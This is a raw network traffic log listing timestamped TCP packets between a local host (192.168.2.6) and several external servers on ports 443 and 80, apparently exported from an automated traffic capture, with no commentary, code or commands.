Dec 8, 2024 13:31:42.631055117 CET	443	49825	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:43.043416977 CET	443	49820	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:43.043489933 CET	443	49820	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:43.043793917 CET	49820	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:43.043823957 CET	49820	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:43.043823957 CET	49820	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:43.043843985 CET	443	49820	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:43.043853045 CET	443	49820	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:43.046406031 CET	49826	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:43.046456099 CET	443	49826	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:43.046577930 CET	49826	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:43.046750069 CET	49826	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:43.046763897 CET	443	49826	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:43.301050901 CET	443	49822	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:43.301522017 CET	49822	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:43.301538944 CET	443	49822	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:43.302098989 CET	49822	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:43.302107096 CET	443	49822	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:43.707375050 CET	443	49823	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:43.707814932 CET	49823	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:43.707835913 CET	443	49823	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:43.708273888 CET	49823	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:43.708277941 CET	443	49823	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:43.708743095 CET	443	49824	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:43.712336063 CET	49824	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:43.712359905 CET	443	49824	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:43.712734938 CET	49824	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:43.712740898 CET	443	49824	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:43.735668898 CET	443	49822	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:43.735776901 CET	443	49822	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:43.735886097 CET	49822	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:43.736095905 CET	49822	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:43.736119986 CET	443	49822	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:43.736133099 CET	49822	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:43.736144066 CET	443	49822	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:43.738437891 CET	49828	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:43.738478899 CET	443	49828	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:43.738610983 CET	49828	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:43.738750935 CET	49828	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:43.738763094 CET	443	49828	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.141654015 CET	443	49823	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.141746998 CET	443	49823	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.141808033 CET	49823	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:44.142369986 CET	443	49824	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.142452955 CET	443	49824	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.142509937 CET	49824	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:44.156289101 CET	49823	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:44.156311035 CET	443	49823	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.156322002 CET	49823	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:44.156328917 CET	443	49823	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.157610893 CET	49824	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:44.157610893 CET	49824	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:44.157644987 CET	443	49824	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.157660961 CET	443	49824	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.161063910 CET	49829	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:44.161099911 CET	443	49829	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.161151886 CET	49829	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:44.161341906 CET	49829	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:44.161348104 CET	443	49829	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.161962032 CET	49830	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:44.162000895 CET	443	49830	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.162051916 CET	49830	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:44.162353992 CET	49830	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:44.162369967 CET	443	49830	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.343915939 CET	443	49825	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.344341993 CET	49825	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:44.344374895 CET	443	49825	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.344955921 CET	49825	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:44.344968081 CET	443	49825	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.761380911 CET	443	49826	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.761780977 CET	49826	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:44.761816978 CET	443	49826	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.762320042 CET	49826	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:44.762330055 CET	443	49826	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.782110929 CET	443	49825	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.782180071 CET	443	49825	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.782231092 CET	49825	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:44.782495022 CET	49825	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:44.782521009 CET	443	49825	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.782533884 CET	49825	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:44.782540083 CET	443	49825	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.784769058 CET	49831	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:44.784811020 CET	443	49831	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.784869909 CET	49831	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:44.784991026 CET	49831	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:44.785007954 CET	443	49831	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:44.907110929 CET	49832	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:44.907155037 CET	443	49832	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:44.907303095 CET	49832	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:45.080535889 CET	49832	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:45.080559969 CET	443	49832	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:45.195214987 CET	443	49826	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:45.195296049 CET	443	49826	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:45.195373058 CET	49826	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:45.195662022 CET	49826	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:45.195683002 CET	443	49826	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:45.195717096 CET	49826	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:45.195724010 CET	443	49826	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:45.198431969 CET	49833	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:45.198478937 CET	443	49833	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:45.198934078 CET	49833	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:45.199131966 CET	49833	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:45.199146032 CET	443	49833	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:45.284874916 CET	49834	443	192.168.2.6	150.171.28.10
Dec 8, 2024 13:31:45.284940958 CET	443	49834	150.171.28.10	192.168.2.6
Dec 8, 2024 13:31:45.285032988 CET	49834	443	192.168.2.6	150.171.28.10
Dec 8, 2024 13:31:45.287930965 CET	49834	443	192.168.2.6	150.171.28.10
Dec 8, 2024 13:31:45.287955999 CET	443	49834	150.171.28.10	192.168.2.6
Dec 8, 2024 13:31:45.376094103 CET	49791	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:45.376365900 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:45.458066940 CET	443	49828	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:45.458988905 CET	49828	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:45.458988905 CET	49828	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:45.459012032 CET	443	49828	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:45.459036112 CET	443	49828	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:45.516417027 CET	80	49791	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:45.516436100 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:45.516566038 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:45.526499033 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:45.646300077 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:45.892231941 CET	443	49828	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:45.892301083 CET	443	49828	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:45.892446041 CET	49828	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:45.892620087 CET	49828	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:45.892637968 CET	443	49828	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:45.892692089 CET	49828	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:45.892698050 CET	443	49828	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:45.896337032 CET	49836	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:45.896378994 CET	443	49836	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:45.896532059 CET	49836	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:45.896687031 CET	49836	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:45.896703959 CET	443	49836	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:45.905690908 CET	443	49830	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:45.906035900 CET	443	49829	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:45.906210899 CET	49830	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:45.906225920 CET	443	49830	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:45.906512976 CET	49829	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:45.906528950 CET	443	49829	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:45.906903982 CET	49829	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:45.906908989 CET	443	49829	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:45.906968117 CET	49830	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:45.906972885 CET	443	49830	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:46.340248108 CET	443	49830	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:46.340332985 CET	443	49830	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:46.340387106 CET	49830	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:46.340595007 CET	49830	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:46.340612888 CET	443	49830	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:46.340640068 CET	49830	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:46.340646029 CET	443	49830	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:46.340955019 CET	443	49829	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:46.341036081 CET	443	49829	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:46.341073990 CET	49829	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:46.341845036 CET	49829	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:46.341869116 CET	443	49829	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:46.341882944 CET	49829	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:46.341888905 CET	443	49829	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:46.344065905 CET	49837	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:46.344099998 CET	443	49837	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:46.344173908 CET	49837	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:46.344296932 CET	49837	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:46.344309092 CET	443	49837	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:46.344391108 CET	49838	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:46.344429970 CET	443	49838	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:46.344485998 CET	49838	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:46.344623089 CET	49838	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:46.344640970 CET	443	49838	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:46.502306938 CET	443	49831	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:46.502769947 CET	49831	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:46.502789974 CET	443	49831	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:46.503237009 CET	49831	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:46.503254890 CET	443	49831	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:46.815459967 CET	443	49832	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:46.815551996 CET	49832	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:46.819892883 CET	443	49834	150.171.28.10	192.168.2.6
Dec 8, 2024 13:31:46.819961071 CET	49834	443	192.168.2.6	150.171.28.10
Dec 8, 2024 13:31:46.820674896 CET	443	49834	150.171.28.10	192.168.2.6
Dec 8, 2024 13:31:46.820720911 CET	49834	443	192.168.2.6	150.171.28.10
Dec 8, 2024 13:31:46.823373079 CET	49832	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:46.823391914 CET	443	49832	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:46.823645115 CET	443	49832	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:46.823681116 CET	49832	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:46.828710079 CET	49834	443	192.168.2.6	150.171.28.10
Dec 8, 2024 13:31:46.828722000 CET	443	49834	150.171.28.10	192.168.2.6
Dec 8, 2024 13:31:46.829022884 CET	443	49834	150.171.28.10	192.168.2.6
Dec 8, 2024 13:31:46.829093933 CET	49834	443	192.168.2.6	150.171.28.10
Dec 8, 2024 13:31:46.837385893 CET	49832	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:46.837438107 CET	443	49832	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:46.841178894 CET	49834	443	192.168.2.6	150.171.28.10
Dec 8, 2024 13:31:46.887331963 CET	443	49834	150.171.28.10	192.168.2.6
Dec 8, 2024 13:31:46.969976902 CET	443	49831	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:46.970052004 CET	443	49831	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:46.970177889 CET	49831	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:46.970705986 CET	49831	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:46.970730066 CET	443	49831	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:46.970741034 CET	49831	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:46.970746994 CET	443	49831	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:46.974132061 CET	49839	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:46.974188089 CET	443	49839	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:46.974258900 CET	49839	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:46.974415064 CET	49839	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:46.974428892 CET	443	49839	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:46.990910053 CET	443	49833	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:46.991283894 CET	49833	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:46.991311073 CET	443	49833	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:46.991719007 CET	49833	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:46.991724014 CET	443	49833	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:47.231991053 CET	443	49832	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:47.232009888 CET	443	49832	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:47.232059956 CET	49832	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:47.232086897 CET	443	49832	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:47.232100964 CET	443	49832	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:47.232132912 CET	49832	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:47.234004974 CET	49832	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:47.234023094 CET	443	49832	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:47.263484001 CET	443	49834	150.171.28.10	192.168.2.6
Dec 8, 2024 13:31:47.263622046 CET	49834	443	192.168.2.6	150.171.28.10
Dec 8, 2024 13:31:47.263645887 CET	443	49834	150.171.28.10	192.168.2.6
Dec 8, 2024 13:31:47.263660908 CET	443	49834	150.171.28.10	192.168.2.6
Dec 8, 2024 13:31:47.263679028 CET	49834	443	192.168.2.6	150.171.28.10
Dec 8, 2024 13:31:47.263688087 CET	443	49834	150.171.28.10	192.168.2.6
Dec 8, 2024 13:31:47.263704062 CET	49834	443	192.168.2.6	150.171.28.10
Dec 8, 2024 13:31:47.356347084 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:47.356408119 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:47.424757957 CET	443	49833	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:47.424829006 CET	443	49833	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:47.424886942 CET	49833	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:47.425626040 CET	49833	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:47.425648928 CET	443	49833	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:47.430608034 CET	49840	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:47.430641890 CET	443	49840	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:47.430730104 CET	49840	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:47.431272030 CET	49840	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:47.431288958 CET	443	49840	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:47.435679913 CET	49841	443	192.168.2.6	23.206.197.42
Dec 8, 2024 13:31:47.435728073 CET	443	49841	23.206.197.42	192.168.2.6
Dec 8, 2024 13:31:47.435843945 CET	49841	443	192.168.2.6	23.206.197.42
Dec 8, 2024 13:31:47.446505070 CET	49841	443	192.168.2.6	23.206.197.42
Dec 8, 2024 13:31:47.446532011 CET	443	49841	23.206.197.42	192.168.2.6
Dec 8, 2024 13:31:47.612941980 CET	443	49836	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:47.617408037 CET	49836	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:47.617433071 CET	443	49836	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:47.617887974 CET	49836	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:47.617892027 CET	443	49836	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:47.795330048 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:47.915066004 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.051538944 CET	443	49836	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.051615953 CET	443	49836	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.051917076 CET	49836	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:48.052000046 CET	49836	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:48.052016020 CET	443	49836	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.052052975 CET	49836	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:48.052064896 CET	443	49836	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.054691076 CET	49842	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:48.054739952 CET	443	49842	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.054804087 CET	49842	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:48.054989100 CET	49842	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:48.055001974 CET	443	49842	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.062339067 CET	443	49837	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.062350035 CET	443	49838	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.062740088 CET	49837	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:48.062748909 CET	49838	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:48.062757015 CET	443	49837	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.062764883 CET	443	49838	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.063703060 CET	49837	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:48.063710928 CET	443	49837	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.063735962 CET	49838	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:48.063744068 CET	443	49838	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.240195036 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.240209103 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.240223885 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.240251064 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.240262032 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.240272045 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.240283966 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.240294933 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.240293026 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.240293980 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.240345955 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.240345955 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.240526915 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.240537882 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.240617037 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.250220060 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.250281096 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.359704018 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.359891891 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.433589935 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.433644056 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.433733940 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.433877945 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.437688112 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.437794924 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.437818050 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.437958956 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.445997953 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.446166039 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.446198940 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.446327925 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.454355001 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.454396009 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.454422951 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.454466105 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.462449074 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.462559938 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.462589979 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.462651968 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.470766068 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.470837116 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.470874071 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.470952988 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.479012012 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.479146957 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.479176998 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.479280949 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.487237930 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.487330914 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.487354994 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.487499952 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.495455980 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.495585918 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.495608091 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.495671988 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.497061968 CET	443	49838	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.497136116 CET	443	49838	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.497414112 CET	49838	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:48.497414112 CET	49838	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:48.497478962 CET	49838	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:48.497505903 CET	443	49838	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.497531891 CET	443	49837	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.497612953 CET	443	49837	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.497710943 CET	49837	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:48.497792006 CET	49837	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:48.497792006 CET	49837	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:48.497809887 CET	443	49837	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.497817993 CET	443	49837	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.500305891 CET	49844	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:48.500305891 CET	49843	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:48.500329018 CET	443	49844	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.500343084 CET	443	49843	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.500442982 CET	49843	443	192.168.2.6	13.107.246.63
